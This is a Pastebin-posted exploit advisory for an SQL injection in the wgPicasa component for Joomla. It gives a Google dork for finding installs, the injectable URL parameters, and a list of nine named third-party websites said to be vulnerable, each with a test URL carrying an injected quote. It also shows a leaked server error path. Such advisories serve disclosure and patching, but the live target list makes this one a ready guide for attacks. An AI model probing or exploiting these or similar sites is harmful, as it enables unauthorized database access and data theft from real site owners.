Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla wgPicasa Components 3x SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 01/02/2019
- # Vendor Homepage : wgjoomla.com
- # Software Download Link : wgjoomla.com/cms/download-files
- # Software Information Link : extensions.joomla.org/extension/wgpicasa/
- # Software Version : 3x
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_wgpicasa''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- The wgPicasa extension is a very simple and powerful component to show
- your albums installed at Google Picasa Web Gallery (Google PLUS).
- No costs for hosting and easy in use.
- It is installed with the very popular "Light-box Slide Gallery.
- It is for Joomla 1.5, 2.5 and 3x versions.
- ####################################################################
- # Impact :
- ***********
- Joomla wgPicasa 3x component for Joomla! is
- prone to an SQL-injection vulnerability because it fails to sufficiently
- sanitize user-supplied data before using it in an SQL query.
- A successful exploit may allow an attacker to compromise the application, access
- or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_wgpicasa&view=wgpicasa&Itemid=[SQL Injection]
- /index.php?option=com_wgpicasa&view=wgpicasa&Itemid=[SQL Injection]
- /index.php?option=com_wgpicasa&view=album&album=[ID-NUMBER]&page=[ID-NUMBER]&Itemid=[ID-NUMBER]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] heladiamejia.edu.co/inicio/index.php?option=com_wgpicasa&view=album&album=1&page=1&Itemid=190%27
- [+] cidadedenaron.eu/index.php?option=com_wgpicasa&view=wgpicasa&Itemid=126%27
- [+] web.orientacio.cat/index.php?option=com_wgpicasa&view=wgpicasa&Itemid=134%27
- [+] milonga.paroquiadoestoril.com/milonga/index.php?option=com_wgpicasa&view=wgpicasa&Itemid=124%27
- [+] prodalfer.com/index.php?option=com_wgpicasa&view=wgpicasa&Itemid=729%27
- [+] greenbikerg.com/index.php?option=com_wgpicasa&view=album&album=1&page=1%27
- [+] revistalugardeencuentro.com/webantigua/index.php?option=com_wgpicasa&view=album&album=1&page=1&Itemid=30%27
- [+] sarkola.info/index.php?option=com_wgpicasa&view=wgpicasa&Itemid=537%27
- [+] eletfanet.hu/j25/index.php?option=com_wgpicasa&view=album&album=1&page=1&Itemid=796%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Strict Standards: Declaration of wgpicasaController::display() should be
- compatible with JController::display($cachable = false, $urlparams
- = false) in /var/www/vhosts/cidadedenaron.eu/httpdocs
- /components/com_wgpicasa/controller.php on line 26
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment